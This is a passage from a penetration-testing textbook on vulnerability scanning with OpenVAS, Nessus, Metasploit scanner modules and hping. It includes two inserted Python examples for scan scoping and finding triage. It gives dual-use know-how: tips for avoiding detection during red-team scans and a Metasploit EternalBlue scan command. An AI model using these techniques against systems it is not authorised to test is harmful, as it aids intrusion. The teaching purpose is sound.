Another issue is that if you are engaged in a red team test where the target has no idea you are running attacks, you want to be sure they don't detect you, or at least you want to do everything you can to avoid detection. Blindly running a lot of exploits against a lot of systems, including systems that may not even have the application that's vulnerable, is going to be noisy, and if there is any detection capability, you will be caught. That means you will have failed.

A better approach is to use a vulnerability scanner, which takes an intelligent approach to identifying potential vulnerabilities. A vulnerability scanner will identify open ports and listening applications and then determine what vulnerabilities may be possible based on those applications. The scanner will then run tests that have been defined for those vulnerabilities. The objective of a scanner is not to compromise a system; it is just to identify potential vulnerabilities. This does not guarantee that what the scanner has identified is an exploitable vulnerability
It means that the scanner has found something it believes is a vulnerability based on interactions with the target system as compared with data the vulnerability scanner has. This is called a false positive. Any issue found by a vulnerability scanner needs to be verified manually. This may include investigating the actual interaction as presented by the scanner—sometimes it's based on return codes without looking at the actual data, for instance. It may also involve actually redoing the test performed by the vulnerability scanner. The vulnerability scanner is a tool and shouldn't be considered to be the end of your testing. It's the starting point. In spite of how good vulnerability scanners are, they are not the terminus.

Note: These are the four categories of vulnerabilities:

■ False positive: The scanner has identified something it believes to be a vulnerability. After investigation, it turns out it's not really a vulnerability.
■ False negative: The scanner has not identified a vulnerability. It later turns out that there was a vulnerability that the scanner missed.
■ True positive: The scanner has identified a vulnerability that, after manual investigation, turns out to be a legitimate vulnerability.
■ True negative: The scanner has not identified a vulnerability and there is not a vulnerability to identify.

For a historical perspective, it's worth noting that network vulnerability scanners have been around since the early 1990s. The first one, developed by Dan Farmer and Wietse Venema, was known as Security Analysis Tool for Auditing Networks (SATAN). SATAN then spawned additional tools like Security Auditor's Research Assistant (SARA) and Security Administrator's Integrated Network Tool (SAINT). SATAN was written primarily in Perl and used a web interface. While Perl has been replaced by other languages for modern vulnerability scanners, they do generally use web interfaces. One of the vulnerability scanners that became very popular is Nessus. We'll take a look at Nessus shortly, but we'll start with OpenVAS, which is related to Nessus.

I had tried to grab a copy of SATAN just to run it again for fun, since I last ran it 30 or so years ago. While the SATAN web page is still available, none of the mirrors that once had it are available. However, you can still get a copy of SARA, which hasn't been updated in years, and SAINT, which is now a commercial product.

OpenVAS

SATAN was open source, meaning you could look at everything SATAN was doing and, if you felt like it, extend its functionality by adding modules yourself. If you could find a copy of SATAN somewhere, you would still be able to look at the source code. Another open source vulnerability scanner in the early 2000s was Nessus. It was initially released in 1998 as a freely available vulnerability scanner and remained so until 2005 when the company, formed three years before, closed the source code, making all future development proprietary to the company. At that point, the existing Nessus source was version 2 and the first version from Tenable was version 3. The existing source code for version 2 was open, however, and two separate projects were created, where the Nessus code for version 2, abandoned by the Nessus developers, was forked to create a basis for the new projects. One of these forks was the Open Vulnerability Assessment System (OpenVAS). Initially, OpenVAS was essentially the same as Nessus, as you'd expect. Over time, though, OpenVAS developed its own application architecture, using multiple tiers that Nessus hadn't explicitly used. Nessus initially had a native application client to manage the scans, and OpenVAS continued to use the same native application. OpenVAS developed the Greenbone Security Assistant (GSA) as the user interface for OpenVAS. Today, GSA is accessed through a web interface. You can see the login screen from GSA in Figure 5.7.

FIGURE 5.7 Greenbone Security Assistant

OpenVAS allows you to have multiple users, each of which may have different permissions. Some users may be able to create scans, while others may only be able to look at the scan results. Other users would be able to create users and administer the OpenVAS installation. In addition to users, OpenVAS supports roles. Permissions within the roles can be altered and new roles can be created. When you install OpenVAS, the admin user is created as part of the setup process, and a random password is generated.

Setting Up Targets in OpenVAS

A scan in OpenVAS has many components. When you create a scan, you need a target or set of targets. Creating a target also requires some information. You need the set of IP addresses you want to run tests on. You can also exclude addresses from the set you are testing. You may do this to provide a network block in your target list, but you may also have fragile systems in that network block. Because of that, you may want to tell OpenVAS not to test that address. Figure 5.8 shows the dialog box in OpenVAS where you create a target. You'll see the IP addresses as well as the exclusions.

FIGURE 5.8 Creating a target in OpenVAS

You will also see that you can create a set of ports that you want to scan. One thing a vulnerability scanner like OpenVAS does is scan ports to determine which ones it should be focusing testing on. You can determine the range of ports you want to test. This can limit the amount of testing you do if you only care about testing against particular services. This is one way of controlling the scope of what OpenVAS is doing.

You aren't always going to be doing black-box testing, meaning you aren't always going to have no information. Sometimes you will have details about your target. Those details can be useful because they can help you get a deeper sense of the vulnerabilities your target organization is subject to. For example, you may be provided with credentials, and those credentials can be used in OpenVAS. The credentials, when provided to OpenVAS, will allow the scanner to look at local vulnerabilities and not just network or remote vulnerabilities. The credentials will be used by OpenVAS to log in to the system. Once OpenVAS has authenticated, it can start looking for local vulnerabilities.

While you can create credentials from the target window, you can also just create credentials from the Configuration menu. When you indicate that you want to create credentials, whether you're in the Target Create window or you are just going to Credentials from the Configuration menu, you are going to get the window shown in Figure 5.9. You can create credentials that can be used across multiple protocols, using different authentication schemes. This may be just username and password, or it may be using SSH keys in place of the password. Once the credentials are created, they can be applied to your target.

FIGURE 5.9 Creating credentials in OpenVAS

One of the issues with this is that it assumes the same credentials are used across multiple systems, since you can only apply one set of credentials per protocol. This may work if you have a centralized user account store. If not, you could also group your targets to match credentials.

Scan Configs in OpenVAS

The core of a scan is in the scan config. The scan config is the definition of what plugins are tested against the target. By default, there are eight scan configs defined in OpenVAS. You can see the list of those scan configs in Figure 5.10. You can see the number of network vulnerability tests (NVTs) that have been enabled in each config. The NVTs are categorized into families for organizational purposes. You can enable the entire family or just enable individual NVTs as you need to. You will notice that there is a config named Empty that has no NVTs enabled in it. There is a second config that has no NVTs enabled. The config named MyScan, which also has no NVTs, is one I created.

To create a scan config, you click the small blue icon with a star in it at the top left of the screen. You will be asked to provide a name for it and then indicate which base template you want to start with. One option is an empty config, which is what I used for MyScan, and the other is full and fast. This includes all the NVTs. So, you can build from nothing or you can pare back from everything. You'll know how you want to think about this based on what you are doing—start from scratch and build up or pare down from a large chunk.

Once you've created the scan, you have a config you can use. Creating is as simple as naming it and determining what the base config is. You'll likely want to tune it, though, so you are running tests that are significant to your target network. This is not to say that tests will be run blindly. OpenVAS will make determinations about what tests to run based on what it finds from some initial scans. When you are ready to select different tests to run, you will need to edit your scan config. You'll make decisions about tests to run by first determining the families you want to enable. You can see a partial list of the families in Figure 5.11.

FIGURE 5.10 OpenVAS scan configs
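The scope a target definition and a port list describe, as an added example that is not code from OpenVAS, Metasploit or this book: it expands address blocks, drops an exclude list of fragile hosts, and parses a port list in the 22-25,80,110-900 form the Metasploit PORTS option accepts, then reports how many probes that scope represents before anything is sent. The addresses, the exclusions and the BATCHSIZE-style batching are constructed assumptions.

```python
"""Scope expansion for a scan: a target definition (address blocks plus an
exclude list for fragile hosts) and a port list in the 22-25,80,110-900 form.

Added example for this chapter; not code from OpenVAS, Metasploit or the
book. The addresses and port specification below are constructed."""
import ipaddress

def parse_ports(spec):
    """Return sorted, de-duplicated ports from a spec like '22-25,80,110-900'.
    Anything outside 1-65535 or a descending range such as '80-8' raises,
    so a typo cannot silently shrink or explode the scope."""
    ports = set()
    for item in spec.replace(" ", "").split(","):
        if not item:
            continue
        if "-" in item:
            lo, hi = (int(x) for x in item.split("-", 1))
        else:
            lo = hi = int(item)
        if not 1 <= lo <= hi <= 65535:
            raise ValueError(f"invalid port item: {item!r}")
        ports.update(range(lo, hi + 1))
    return sorted(ports)

def _usable(net):
    """Addresses a scanner would actually probe in a block: skip the network
    and broadcast addresses of ordinary blocks; keep everything for /31
    (point-to-point) and /32 (a single host)."""
    addrs = list(net)
    if net.prefixlen >= net.max_prefixlen - 1:
        return addrs
    return addrs[1:-1]

def expand_targets(include, exclude=()):
    """Expand blocks and single addresses in order, dropping duplicates and
    anything covered by the exclude list (exclusions may be blocks too)."""
    excluded = set()
    for item in exclude:
        excluded.update(ipaddress.ip_network(item, strict=False))
    targets, seen = [], set()
    for item in include:
        for addr in _usable(ipaddress.ip_network(item, strict=False)):
            if addr in excluded or addr in seen:
                continue
            seen.add(addr)
            targets.append(str(addr))
    return targets

def batches(targets, batch_size=256):
    """Split the target list into sets of batch_size hosts, the role the
    Metasploit SYN scanner's BATCHSIZE option plays."""
    return [targets[i:i + batch_size] for i in range(0, len(targets), batch_size)]

def scan_plan(include, exclude, port_spec, batch_size=256):
    """Summarize how much work a scope represents before running anything."""
    targets = expand_targets(include, exclude)
    ports = parse_ports(port_spec)
    return {
        "hosts": len(targets),
        "ports": len(ports),
        "probes": len(targets) * len(ports),
        "batches": len(batches(targets, batch_size)),
    }

# Constructed scope: one /24 plus a single host elsewhere, with the block's
# gateway and a small range of fragile devices excluded.
INCLUDE = ["192.168.4.0/24", "10.0.0.5"]
EXCLUDE = ["192.168.4.1", "192.168.4.200/30"]
PORT_SPEC = "22-25,80,110-900"

if __name__ == "__main__":
    print(scan_plan(INCLUDE, EXCLUDE, PORT_SPEC))
```

The probe count is the number you want to look at before pressing start: 250 hosts against 796 ports is almost 200,000 connection attempts, which is exactly the kind of volume the text warns is noisy and hard on fragile systems. Rejecting a descending range instead of silently swapping its ends is deliberate, since a mistyped range otherwise changes the scope without anyone noticing.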
There are some elements here to consider. Not only can you determine whether to enable families, and which NVTs to enable, but you can also determine how a family keeps up as NVTs are added over time. You can select to keep the config static or you can have OpenVAS enable new ones as they are added to the OpenVAS installation. Once you open up the family, you will get a list of all the NVTs that belong to that family. Figure 5.12 shows the list of NVTs that belong to the Firewalls family. You'll notice that on the right side there is a small blue wrench icon. Clicking this will bring up a dialog showing you where there may be preferences that relate to that NVT. In the firewall NVTs, for instance, there are timeout values that you can change if you don't want to use the default value. This list of NVTs allows you to select exactly which ones you want to include in the config. You don't have to have large, blanket configs. You can specifically tailor your scan configs based on the environment you are testing.

At this point, you have a scan config you can run against a target. This means you need to move on to creating a task that will run your scan config for you. You'll be able to do this as a one-off or in a scheduled task.

FIGURE 5.11 OpenVAS NVT families

Running a Scan

One important idea to keep in mind is that once you run a scan, the focus should be identifying a remediation plan for any vulnerabilities found. Running a scan and then ignoring the results is probably worse than not running the scan at all. From a liability perspective, it means that vulnerabilities were identified, meaning they were known, without anything being done about them. At least some analysis should be performed to document a response to each vulnerability, based on a risk assessment and company policy.

FIGURE 5.12 OpenVAS NVT selections

Scan Tasks

Scan configs and targets are necessary to create a scan task. You'll be able to create the target as part of creating a scan task, and it will persist just as if you had gone to the target configuration separately. The scan config, though, has to be done ahead of time unless you want to use one of the prepackaged scan configs. When you go to the Scans menu and then select Tasks, you will get something that looks like what you see in Figure 5.13. This shows that there has been one scan already that has been run. The more scans you run, the more the charts will change.

FIGURE 5.13 OpenVAS tasks

When you start a scan, you will see a light-blue icon in the upper left with a star in it. You would hover over this and then click New Task. This will bring up the dialog box shown in Figure 5.14. From here, you will need to select your target from a pull-down list. If you haven't created a target, you can click the blue star icon to create a target and save it. You can also create alerts based on severity or a filter you create. You'll be able to send alerts via email, an HTTP GET request, SMB, SNMP, or other connections. You will also need to select your scan config. This can be one of the configs you have created or one of the default configs.

You can create a schedule for the scan, but by default there is no schedule. The task will be created, waiting for you to start it. Using a schedule, you can have the scan run as often as you would like. You may not want it to run regularly or you may not want to run it right away. You will be able to tell OpenVAS to just run it once, as you can see in Figure 5.14. The target and scan config will be populated, assuming there is a target configured. The scan config will be populated with the first scan config in the list. These are two configuration elements you will want to make sure you check on since they are the most important and relevant factors for your scan.

FIGURE 5.14 OpenVAS task creation

This does not mean, though, that there are no other elements that are worth looking at. If you have a large network and multiple scanner systems, you may want to select which scanner you want this to run from. You will also be able to define the source interface in case you have multiple interfaces on your scanner. You will also want to determine the order in which you want to scan your targets. This may depend on whether you are trying to hide your activities and whether you think a random selection of hosts will potentially make it look less obvious that you are running a scan. You can also help with that by reducing the number of simultaneously scanned hosts as well as the maximum number of concurrent NVTs tested against a single host.

To start up the scan, you will need to look at your list of tasks and click the green arrow that looks like a start button on an audio or video player. The scan will not run until you have started it. Just creating the scan means you have set the parameters for it. It doesn't mean you have started the scan. This is where the schedule can be useful, because OpenVAS will start the scan for you when you say rather than expecting you to start it.

Scan Results

You will be able to monitor your scan results as the scan is running. However, you will also be able to review all the completed scans and review historic vulnerabilities. The scans dashboard will provide you with charts for visualization of your vulnerabilities over time so you can get a sense of whether the security posture of your target is improving. You can get a look at the dashboard in Figure 5.15. What you see is some charts that focus on the reports. What you don't see from these charts is what the vulnerabilities from all your scans look like. At the bottom of this figure you can see a synopsis of the two scans that have been run in this installation. The immediate scan was done using the Task Wizard, which is a quick start way of kicking off a scan.

FIGURE 5.15 OpenVAS scans dashboard

The Scans menu provides access to different ways of looking at the results. The first way we will look at is via the Results page. This has a list of all the results from all the scans. You will also get more charts. You can see the list of results and the accompanying charts in Figure 5.16. The charts are interesting, but the list of results has some information that is of note. In the first column, you will see a short name for the vulnerability. This should provide you with enough information so you will know essentially what the vulnerability is. At a minimum, you will know something about the service or device from the vulnerability name.

FIGURE 5.16 OpenVAS results list

You will also get additional useful information. You will see that beyond the summary is the severity. The severity values would include High, Medium, and Low. To the left of the severity is the solution type. What you see in the samples here are all vendor fixes. You may also see mitigation, which means there are ways to alleviate the impact if the vulnerability were to be exploited. You may also see that there are no fixes available. While all that is shown in Figure 5.16 are issues that have vendor fixes, there are also issues found that have no fixes as well as issues that have mitigations.

To the right of the severity is something shown as QoD. This is the quality of detection, and what it means is how certain OpenVAS is about whether the vulnerability is a true positive. You will see some very high numbers in that column for some apparent macOS vulnerabilities. Considering that the systems identified are running the latest macOS and were fully patched at the time of the scan, these high confidence numbers are misleading. To understand exactly what OpenVAS was looking for to make the determination would require looking at the NASL file associated with the identified vulnerability.

In the far-right column, you can access actions, as shown in Figure 5.17. Since these reports remain stored in OpenVAS as long as the instance remains, you probably want to make necessary changes to the findings. As in the case of the macOS findings, I could add an override. As noted earlier, not every finding is just as it is presented by OpenVAS. Some of them may be false positives, for instance. You can change the severity of the finding to false positive by using an override. You can see the dialog box that lets you set override parameters, including setting the severity to false positive, in Figure 5.17.

FIGURE 5.17
Setting an override

Of course, a false positive is not the only change to severity that you can make. You can either increase or decrease the severity. You may know quite a bit more than OpenVAS does, especially if you either work for the company you are testing for or are working closely with them rather than as a strict adversary. If there are mitigations already in place, you may find you want to lower the severity. There may also be reasons to increase the severity provided by OpenVAS. After all, this is a generic finding, sometimes provided by the software vendor. You can also set other parameters in the override, if it's not a matter of severity that you want to change. If you were to override the severity, you probably want to add a note as well, explaining what the change was and why it was being made. This allows any others who have access to OpenVAS to review the changes that were made and know why the changes were made.

In addition to making changes to parameters like severity, you can add notes to each of the findings. That is the other icon under the Actions column. Using notes and overrides allows you to use OpenVAS as more of a vulnerability management tool, to some degree, rather than just a vulnerability scanner. You can use it for historical purposes, to identify known vulnerabilities, or to make alterations to different parameters. This stored information may be useful because anyone tasked with protecting systems and networks will be constantly fighting against vulnerabilities. Historical information, especially mitigations and what was done to remediate the vulnerabilities, will be useful for security professionals.

Nessus

Nessus is the parent of OpenVAS, which makes it worth looking at, especially to see how it has diverged from the path OpenVAS took. While Nessus is a commercial product, there is a home license so you can use it on your home network to compare against OpenVAS and also see another approach to vulnerability scanning. When you log in, you're taken to your list of scans, which will be empty at first. To start a scan, you would click the New button, which will take you to a list of the different scan policies that are available. You can see some of the scan policies that are built into Nessus in Figure 5.18. You will see Upgrade printed across some of the scan policies. This means these scan policies are available only in the commercial version and not available in the Home license.

FIGURE 5.18 Scan policies in Nessus

If we select the Basic Network Scan as our starting point, we can begin to select our target and then go through customization. Figure 5.19 shows the configuration settings for the Basic Network Scan. You'll see in the first screen that you provide the name of the scan. Keep in mind that you are creating a configuration here and you can run that configuration multiple times. Each run will have a timestamp associated with it, so you don't need to add your own date and time as part of the name. You'll want to name it something that is meaningful to you so you can differentiate this configuration from other configurations.

FIGURE 5.19 Scan configuration settings

You might, for instance, have a configuration where you have a specific set of credentials. Figure 5.20 shows the configuration for credentials. You'll see that you can create SSH and Windows credentials for host authentication. For each of these types, you will be able to create multiple configurations. You could use SSH key authentication for some systems and then also have an authentication setting for where you need to use the username and password. According to the interface, you can have unlimited credentials for both SSH and Windows. To create another set of credentials, there is a button at the end of the line indicating the credential type. In addition to host credentials, you can set authentication credentials for database, miscellaneous, and plaintext. The last category is for protocols like HTTP, FTP, and SMTP, among others. Miscellaneous gives you settings for VMware and Palo Alto firewalls. This provides the means for Nessus to check local vulnerabilities across a variety of applications and also devices.

In addition to credentials, you can configure the plugins that you want to run. You can get to the plugins by clicking the Plugins tab across the top. Looking back at Figure 5.19, you'll see a set of tabs vertically along the left side. This not only provides you with access to the basic settings that you can see, it also provides you with access to discovery, assessment, report, and advanced configurations. The Discovery tab lets you determine the type of discovery you will be doing on the network, meaning it lets you set port scan parameters. By default, the port scan will be run against common ports. You can select to let it run against all ports, which may mean you could find additional vulnerabilities or at least some ports you may not have expected.

FIGURE 5.20 Credentials configuration settings

The Assessment tab lets you set parameters on what Nessus should scan with respect to web vulnerabilities. By default, Nessus won't scan for web vulnerabilities. You can set different levels of web vulnerability scanning. There is another setting under the Assessment tab that is important. By default, Nessus will limit the number of false positives found. It should be noted that all the settings mentioned here are in the Basic Network Scan policy. Other scan policies will have different settings, some of which you will be able to change. To get access to all of the settings, you should go through the Advanced Scan, where all the settings are exposed and can be changed.

The Report tab lets you adjust the report verbosity. You may want to limit the number of details provided, keeping information in the report to a minimum. The Nessus reports, by default, are fairly comprehensive. Each finding will contain details about the vulnerability as well as its severity, references associated with the vulnerability, and potential remediations. Including enough detail so everything will make enough sense to people who may not be very familiar with Nessus can take up a lot of space.

As the scan is running, and certainly when it is complete, you will be able to view the results. Initially, you will get a list of all the vulnerabilities when you open up the scan by clicking its name under My Scans. You can see a partial list in Figure 5.21. Alongside the list of vulnerabilities identified, you will see a chart of all the identified vulnerabilities to indicate which categories have the most vulnerabilities. In the case of the scan shown, the vast majority are informational messages, while the second highest number of vulnerabilities are in the medium severity category.

FIGURE 5.21 Scan results list

The list of hosts is ordered by the total number of issues identified by Nessus, though findings are not all vulnerabilities since there are informational items, which are not vulnerabilities. Nessus identified a total of 50 hosts on the network, and the host with the IP address ending in .52 had the highest number of vulnerabilities based on vulnerabilities Nessus knew about at the time of the scan. This is not to say there are no other vulnerabilities, which may not be known by Nessus. It's also possible for there to be false negatives, meaning Nessus didn't identify a known vulnerability in spite of the fact that the vulnerability existed on the scanned host. In the right column, you will see a percentage. This percentage indicates how complete Nessus thinks the scan against that host is. This snapshot was taken midscan.

Across the top of the page, you will see three tabs. The first one, and the one that is presented first, is the list of hosts. This is, as noted earlier, ordered by total number of vulnerabilities. The second tab is the number of vulnerabilities. This is ordered by the severity of the finding. The critical issues are on top, followed by the high, then the medium, and so on. A scan of hosts on my network identified two different critical issues. One of them was related to software from the Mozilla Foundation. According to Nessus, either Thunderbird or Firefox is installed on the target host, though the version installed is no longer supported. The second issue has to do with a macOS system. The version of the operating system installed is one behind what is the most current. Figure 5.22 shows details related to the Mozilla vulnerability.

FIGURE 5.22 Finding details

You will see in the output a description of the finding. You will also see the solution, which is to upgrade to a supported version. Below that there are references to other sites that can provide additional details about the issue. Below the reference sites are the details from the scan plugin. This shows the version of the application found as well as the current version of the application that is available. This shows that the version installed is five versions back, and the current version available and supported by the Mozilla Foundation is 61.0. What you don't see in this output is the IP address of the second host where this problem was identified. Only one of the IP addresses is shown for brevity.

Also along the top is a tab labeled Remediations. This provides output indicating how some of the identified vulnerabilities can be remediated. You will see in Figure 5.23 that the four remediations identified are all related to upgrading to the latest version of software, including, in one case, updating the version of the operating system in use.

FIGURE 5.23 Remediations list

As has been noted several times, severities will vary, and just because Nessus believes a severity should be at a certain level doesn't mean that you, with your knowledge of the environment you are working with, will agree. You can create rules in Nessus so findings associated with certain hosts may be automatically recategorized. This can be done from the Plugin Rules tab along the left navigation frame in the main view. Figure 5.24 shows what the dialog box looks like for the Plugin Rules settings. You can specify a host, or just leave that field blank for all hosts. You would need to specify the plugin ID that the rule applies to. With all the parameters in place to identify what the rule applies to, you just set the severity you want associated, and Nessus will take care of the rest.

FIGURE 5.24 Plugin Rules settings
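What a version-check plugin actually does, and what an OpenVAS override or a Nessus plugin rule then does to its output, as an added example that is not code from OpenVAS, Nessus or this book. It runs a banner-based version comparison against a constructed advisory table, recategorizes one finding with a note (host given, as in an OpenVAS override; host left out, as in a Nessus plugin rule), and tallies the report against manually verified ground truth into the four categories from the note earlier in the chapter. The plugin IDs, banners, QoD values and ground truth are all constructed.

```python
"""A model of what a version-check NVT or plugin does, and of the two ways
this chapter shows for recategorizing what it reports: an OpenVAS override on
one finding (host plus NVT) and a Nessus plugin rule (plugin ID, host
optional). The tally at the end classifies the report the way the chapter's
note does: true/false positive, true/false negative.

Added example; not code from OpenVAS, Nessus or the book. The advisory table,
the banners and the verified ground truth are constructed."""
import re

# Constructed advisory data: the product, the first fixed version and a
# quality-of-detection score. A banner-only check earns a modest QoD because
# the banner can lie (distributions backport fixes without bumping it).
ADVISORIES = [
    {"plugin_id": "100001", "product": "OpenSSH", "fixed_in": "8.9", "severity": "Medium", "qod": 70},
    {"plugin_id": "100002", "product": "Apache", "fixed_in": "2.4.52", "severity": "High", "qod": 70},
]

# Constructed banners. 192.168.4.10 runs a distribution build that backported
# the fix, so its banner triggers a finding that manual checking disproves.
SAMPLE_HOSTS = {
    "192.168.4.10": "SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5",
    "192.168.4.15": "SSH-2.0-OpenSSH_9.0",
    "192.168.4.20": "Server: Apache/2.4.49 (Unix)",
    "192.168.4.99": "Server: Apache/2.4.52 (Unix)",
}
# What manual verification established: (host, plugin_id) pairs really vulnerable.
TRULY_VULNERABLE = {("192.168.4.20", "100002")}

def parse_version(text):
    """'2.4.52' -> (2, 4, 52). Comparing tuples keeps 2.4.9 < 2.4.52; comparing
    the strings would not, which is a classic source of wrong results."""
    return tuple(int(p) for p in re.findall(r"\d+", text))

def check_banner(host, banner):
    """Run every advisory's version check against one service banner."""
    findings = []
    for adv in ADVISORIES:
        m = re.search(re.escape(adv["product"]) + r"[_/ ]?(\d+(?:\.\d+)*)", banner)
        if m and parse_version(m.group(1)) < parse_version(adv["fixed_in"]):
            findings.append({"host": host, "plugin_id": adv["plugin_id"],
                             "product": adv["product"], "version": m.group(1),
                             "severity": adv["severity"], "qod": adv["qod"], "notes": []})
    return findings

def run_scan(hosts):
    return [f for host, banner in hosts.items() for f in check_banner(host, banner)]

def recategorize(findings, plugin_id, severity, note, host=None):
    """Override one host's finding (OpenVAS style) or, with host=None, every
    finding for the plugin (Nessus plugin-rule style). The note records why,
    so anyone reviewing later can see the reasoning. Returns the number changed."""
    changed = 0
    for f in findings:
        if f["plugin_id"] == plugin_id and (host is None or f["host"] == host):
            f["notes"].append(f"severity {f['severity']} -> {severity}: {note}")
            f["severity"] = severity
            changed += 1
    return changed

def tally(hosts, findings, truly_vulnerable):
    """Classify the report against verified ground truth over every host/plugin
    pair the scan evaluated. A finding overridden to False Positive no longer
    counts as reported."""
    reported = {(f["host"], f["plugin_id"]) for f in findings if f["severity"] != "False Positive"}
    counts = {"true_positive": 0, "false_positive": 0, "false_negative": 0, "true_negative": 0}
    for host in hosts:
        for adv in ADVISORIES:
            pair = (host, adv["plugin_id"])
            flagged, real = pair in reported, pair in truly_vulnerable
            key = ("true" if flagged == real else "false") + ("_positive" if flagged else "_negative")
            counts[key] += 1
    return counts

if __name__ == "__main__":
    findings = run_scan(SAMPLE_HOSTS)
    print("before triage:", tally(SAMPLE_HOSTS, findings, TRULY_VULNERABLE))
    recategorize(findings, "100001", "False Positive",
                 "Ubuntu backports the fix; package changelog checked on the host",
                 host="192.168.4.10")
    print("after override:", tally(SAMPLE_HOSTS, findings, TRULY_VULNERABLE))
```

The first tally shows one true positive and one false positive; the override with its note turns the second into a true negative while leaving a record of who decided that and why. The QoD value stays attached to the finding deliberately: a banner match is the weakest form of evidence, which is the point the macOS findings made above.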
Unlike OpenVAS, Nessus doesn't give you a way to add notes to findings. One thing you do get, though, that you don't get in OpenVAS is an audit trail. You can search by plugin ID and by host and get additional details about the plugin that was run. As an example, searching for the plugin ID from the critical macOS out-of-date finding shows the IP addresses for hosts where Nessus couldn't identify the OS, hosts where Nessus did identify the OS but it wasn't macOS, and also IP addresses where the operating system was correct but the version number wasn't correct, meaning there was no finding resulting from the run of the plugin.

Like OpenVAS, Nessus uses Network Attack Scripting Language (NASL) scripts. They are stored with the rest of the Nessus installation. On Windows, the installation would be in the Program Files directory. On Linux, the files are stored in /opt/nessus with the plugins in /opt/nessus/lib/plugins. If you want to see exactly what a plugin does so you can verify the finding, you should check the script. You can use the plugin ID to identify the file that is run for that plugin. The script, once you get used to reading them, will provide you with the details on how to replicate the vulnerability test so you can verify. This verification is not only important to rule out false positives, but if it is actually a vulnerability, you will need to have documentation to present to the company or organization you are working with.

Vulnerability scanning is just a stage in the testing. It is not the end. Vulnerabilities should always be verified. Additionally, if you are expected to identify as many vulnerabilities as you can, you will need to move to exploiting these vulnerabilities in hopes of identifying more. While this may require the use of exploit tools like Metasploit or even tools that are custom-developed, it could be that you need to create a packet that looks a particular way. No matter what the findings are, though, they need to be verified before being presented as findings.

Looking for Vulnerabilities with Metasploit

Metasploit is a versatile tool. Certainly, you can use it for exploiting applications as well as the port scanning we did earlier. As it's a framework and there are a lot of modules, it shouldn't come as a big surprise that there are a lot of vulnerability scanners. One example is a scanner module for the EternalBlue vulnerability. This is a vulnerability in the implementation of the Server Message Block (SMB) protocol that was discovered by the National Security Agency (NSA), which developed an exploit for it, which was released without the NSA's approval by a group called the Shadow Brokers. The following is one of the vulnerability scanners that looks for systems vulnerable to the EternalBlue exploit. While the fix for this vulnerability has been out for years at this point, there are still many systems in production that are vulnerable to it.

msf6 auxiliary(scanner/portscan/syn) > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.4.0/24
RHOSTS => 192.168.4.0/24
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[-] 192.168.4.10:445      - Host does NOT appear vulnerable.
[-] 192.168.4.15:445      - Host does NOT appear vulnerable.
[*] 192.168.4.0/24:445    - Scanned 26 of 256 hosts (10% complete)

There are a large number of scanners available in Metasploit. Not all the scanners are directly related to the vulnerabilities. Searching for the word scanner in Metasploit returned 590 results, with some of the output following. In just the output fragment here, you can see that some of them are related to known vulnerabilities while some are looking for instances of applications, which may have a particular configuration issue.

   192  auxiliary/scanner/http/manageengine_deviceexpert_user_creds    2014-08-28  normal  No   ManageEngine DeviceExpert User Credentials
   193  auxiliary/scanner/http/manageengine_securitymanager_traversal  2012-10-19  normal  No   ManageEngine SecurityManager Plus 5.5 Directory Traversal
   194  auxiliary/scanner/http/mediawiki_svg_fileaccess                            normal  No   MediaWiki SVG XML Entity Expansion Remote File Access
   195  auxiliary/scanner/http/meteocontrol_weblog_extractadmin                    normal  No   Meteocontrol WEBlog Password Extractor
   196  auxiliary/scanner/http/mod_negotiation_brute                               normal  No   Apache HTTPD mod_negotiation Filename Bruter
   197  auxiliary/scanner/http/mod_negotiation_scanner                             normal  No   Apache HTTPD mod_negotiation Scanner
   198  auxiliary/scanner/http/ms09_020_webdav_unicode_bypass                      normal  No   MS09-020 IIS6 WebDAV Unicode Authentication Bypass
   199  auxiliary/scanner/http/ms15_034_http_sys_memory_dump                       normal  Yes  MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure

It's not the most comprehensive vulnerability scanner, but if you are already in Metasploit for other purposes, you can make use of vulnerability scan modules to look in a targeted way for some vulnerabilities. If you have a good way to detect a vulnerability and feel like writing a little Ruby, you can write a module for Metasploit that can look for that vulnerability.
Packet Crafting and Manipulation

When you are sending data out over the network, there is a clear path it follows before exiting the network interface on your system. We've gone over this, to a degree, by talking about the Open Systems Interconnection (OSI) model. Let's say that you are visiting a web page. You enter a URL into the address bar. Your browser takes the input and creates the HTTP request headers that are needed to send to the server. For simplicity, we'll skip the encryption pieces and just talk about how the complete packet is put together. The application makes a request of the operating system to open a connection to the server. This triggers the operating system to build a packet using information provided by the application. This includes the hostname or IP address as well as the port number. Unless otherwise provided, the port number will default to either 80 or 443, depending on whether the communication is HTTPS or HTTP. This information will allow the operating system to create the necessary headers for both TCP and IP, layers 4 and 3.

All of this is to say that the application initiates requests based on interaction from the user. It follows a clear path, and the information placed into the necessary headers for each protocol is coherent and easily traced back to the original source of the information. Sometimes, though, you may need to send data that doesn't follow a coherent path. It could be that you need to manipulate headers with data that wouldn't normally be found in the header fields. Each header field is a known size and is binary, which means you aren't going to be sending a character instead of a number, for instance. Nothing in the network headers, looking at layers 4 and below for sure, is data that would go through an ASCII decode to be converted to character data.

There are a number of tools that can be used to craft or otherwise manipulate the header data. Some of these are designed for the sole purpose of creating packets that would look the way you want them to look. This may be a tool like packETH, which uses a GUI to let you set the fields. Others have other purposes that allow you to interact with the target system in a way that you may not otherwise be able to do without writing your own program. A tool like hping will let you build a packet based on the command-line parameters. Using a tool like hping, you could assess the response from the system. Finally, you may want to mangle the packet using a set of rules, which would put the operating system's network stack to the test, to see if it can handle poorly constructed packets.

hping

The program hping is considered by the developer to be the Swiss Army knife of TCP/IP packets. You could use it as a straightforward ping program, sending ICMP echo requests. Since hping is primarily a packet crafting program, allowing you to initiate connections using different protocols with the header settings you want, the default mode may not work very well for you. By default, if you don't specify anything other than the target host or IP address, hping will send messages to port 0 on your target with a varying source address. Address 0 is essentially an invalid destination since it is considered reserved and has no purpose. You shouldn't get any response from the system you are sending traffic to. If you do, the target host is really violating the protocol. While hping uses TCP for this, port 0 is invalid for both UDP and TCP.

